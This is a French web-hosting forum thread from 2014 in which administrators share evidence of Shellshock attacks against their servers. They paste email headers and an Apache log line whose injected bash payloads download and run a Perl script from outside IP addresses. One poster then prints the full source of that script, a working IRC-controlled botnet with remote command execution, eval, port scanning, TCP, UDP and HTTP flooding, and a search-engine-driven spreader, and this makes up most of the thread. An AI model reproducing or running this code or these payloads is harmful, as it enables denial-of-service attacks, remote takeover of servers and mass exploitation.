OVH Community, votre nouvel espace communautaire.

Faille 'bash' ... les pirates sont à nos portes


fritz2cat
29/10/2014, 21h15
tiens au fait, ce ne serait pas en pénétrant qmail que les hackeurs ont cassé tous les serveurs Release 2 ?

Un peu de lecture (en anglais)
http://www.gossamer-threads.com/list...l/users/138578

fritz2cat
24/10/2014, 09h57
Aujourd'hui c'est un kimsufi qui attaque - soit il appartient à un hacker et il faut suspendre le client - soit il appartient à une victime et il faut mettre le serveur en rescue

Received: from ks354558.kimsufi.com (ks354558.kimsufi.com [91.121.107.56])
by k2.dmmail.eu (Postfix) with SMTP id 9983014615C
for ; Fri, 24 Oct 2014 09:34:28 +0200 (CEST)
To) { :; };/usr/bin/id
References) { :; };/usr/bin/id
Cc) { :; };/usr/bin/id
From) { :; };/usr/bin/id
Subject) { :; };/usr/bin/id
Date) { :; };/usr/bin/id
Message-ID) { :; };/usr/bin/id
Comments) { :; };/usr/bin/id
Keywords) { :; };/usr/bin/id
Resent-Date) { :; };/usr/bin/id
Resent-From) { :; };/usr/bin/id
Resent-Sender) { :; };/usr/bin/id

fritz2cat
08/10/2014, 09h25
Maintenant ils attaquent aussi nos mails.

Reçu hier::
Delivered-To: nobody@***.***.eu
Received: from holidaygo.com (holidaygo.com [109.201.141.65])
by ***.***.eu (Postfix) with SMTP id A3252146150
for ; Tue, 7 Oct 2014 20:14:04 +0200 (CEST)
To) { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
References) { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Cc) { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
From) { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Subject) { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Date) { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Message-ID) { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Comments) { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Keywords) { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Resent-Date) { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Resent-From) { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Resent-Sender) { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Gare à ceux qui font du traitement automatisé de leurs mails avec des scripts. En plus la "sanitisation des paramètres" prévoit souvent de supprimer les caractères suspects tels que 0x00,0x0a,0x0d etc, mais pas les : et ;

Sur les distributions debian, nobody est souvent redirigé vers root via le fichier /etc/aliases

Nowwhat
29/09/2014, 12h55
Citation Envoyé par Cehem-63
.... rien compris.
Ca concerne la faille de l'année 2014 "Shell Shock" - déjà qualifié plus dangereux que "Heart-Bleed'.
Pour info: Google "bash faille".

edit: si, t'as compris http://forum.ovh.com/showthread.php?...serveurs-mutu)

Cehem-63
29/09/2014, 12h12
Je n'ai rien compris.

Nowwhat
29/09/2014, 11h55
Ah.
Faut bien accueillir le type comme il faut.
J'ai mis à jour l'installation 'perl' (cpan upgrade etc)

fritz2cat
29/09/2014, 10h53
On commence à en voir passer dans nos logs apache...
grep "{ :;}" /var/log/apache2/*log

je sélectionne une ligne de réponse parmi une demi-douzaine

access.log:173.45.100.18 - - [29/Sep/2014:09:18:13 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
Ce serveur 213.5.67.223 en Hollande est toujours actif ; on va donc aller chercher ce script perl qui s'appelle ji ; et j'ai donc le plaisir de vous faire partager ce bout de programme...
Code:
#!/usr/bin/perl
# ------------------------------------------------------------- #
#			LinuxNet perlbot			#
# ------------------------------------------------------------- #

#system("kill -9 `ps ax |grep /usr/sbin/apache2/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/apache3/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/atd |grep -v grep|awk '{print $1;}'`");

my $processo = '-';


my @titi = ("index.php?page=","main.php?page=");

my $goni = $titi[rand scalar @titi];

my $linas_max='7';
my $sleep='7';
my @adms=("x","JB" );
my @hostauth=("localhost","outlaw");
my @canais=("#gnu");
my $nick='|GNU|';
my $ircname ='GNU';
chop (my $realname = `uname -sr`);
$servidor='ircd.w3h.co.uk' unless $servidor;
my $porta='443';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/tmp");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
     sleep 1;
   }
}
my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}
 
sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
       }
       if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1");
            } else {
                shell("$onde", "$arg");
            }
         } 
       }
	}
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       if (lc($1) eq lc($meunick)) {
         $meunick=$4; 
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       nick("$meunick".int rand(999999));
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $canal (@canais) {
         sendraw("JOIN $canal ddosit");
       }
   }
}


sub bfunc {
  my $printl = $_[0];
  my $funcarg = $_[1];
  if (my $pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
             my (@aberta, %porta_banner);
	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");     
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

             if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
             } else {
               sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); 
             }
           }
           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
	     my $itime = time;
	     my ($cur_time);
             $cur_time = time - $itime;
	     while ($3>$cur_time){
             $cur_time = time - $itime;
	     &tcpflooder("$1","$2","$3");
             }
	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
           }
	   if ($funcarg =~ /^version/) {
		sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);		   
		}
           if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
	     srand;
	     my $itime = time;
	     my ($cur_time);
	     my ($exploited);
	     $boturl=$2;
             $cur_time = time - $itime;$exploited = 0;
		while($1>$cur_time){
		    $cur_time = time - $itime;
		    @urls=fetch();
			foreach $url (@urls) {
			$cur_time = time - $itime;
			my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;

			$url =$path."/$goni$boturl" ;




			$page = http_query($url);
			$exploited = $exploited + 1;
		    }
		}
	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
           }
           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
	     my $itime = time;
	     my ($cur_time);
             $cur_time = time - $itime;
	     while ($2>$cur_time){
             $cur_time = time - $itime;
	     my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
	     close($socket);
             }
	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
           }
           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
           }
           exit;
       }
  }
}
 
sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
     j("$1");
   } 

if ($case =~ /^refresh (.*)/) {
my $goni = $titi[rand scalar @titi];
 }

   if ($case =~ /^part (.*)/) {
      p("$1");
   }
   if ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   if ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   if ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   if ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   if ($case =~ /^eval (.*)/) {
     eval "$1";
   }
}

sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "No such file or directory");
    return;
  } 
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c == "$linas_max") {
               $c=0;
               sleep $sleep;
             }
           }
           exit;
       }
  }
}

sub tcpflooder {
 my $itime = time;
 my ($cur_time);
 my ($ia,$pa,$proto,$j,$l,$t);
 $ia=inet_aton($_[0]);
 $pa=sockaddr_in($_[1],$ia);
 $ftime=$_[2];
 $proto=getprotobyname('tcp');
 $j=0;$l=0;
 $cur_time = time - $itime;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  socket($t,PF_INET,SOCK_STREAM,$proto);
  connect($t,$pa)||$j--;
  $j++;$l++;
 }
 $l=0;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  shutdown($t,2);
  $l++;
 }
}

sub udpflooder {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'A' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  
  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
     for (my $porta = 1; $porta <= 65000; $porta++) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
       }
     }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}

sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");
}  
sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
  sendraw("PART $_[0]");
}
sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}
sub quit {
  sendraw("QUIT :$_[0]");
}

# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $n= 80;
    if ($rnd<5000) { $n<<=1;}
    my $s= (int(rand(5)) * $n);

my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
		"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
		"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
		"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
		"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
		"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
		"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
		"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",		
		"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
		"vu","vn","ye","yu","cd","zm","zw","");
my @str;

foreach $dom  (@dominios)
{
	push (@str,"allinurl:%22".$dom."/".$goni."%22");
}

    my $query="www.google.com/search?q=";
    $query.=$str[(rand(scalar(@str)))];
    $query.="&num=$n&start=$s";


    my @lst=();
    my $page = http_query($query);
    while ($page =~  m/\"]+)\"?>/g){
	if ($1 !~ m/google|cache|translate/){
	    push (@lst,$1);
	}
    }
    return (@lst);
}


sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;

    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
	local $SIG{ALRM} = sub { die "1";};
	alarm 10;
	my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
	print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
	my @r = <$sock>;
	$page="@r";
	alarm 0;
	close($sock);
    };    
    return $page;

}
Bon. Il va falloir étudier le Perl, maintenant.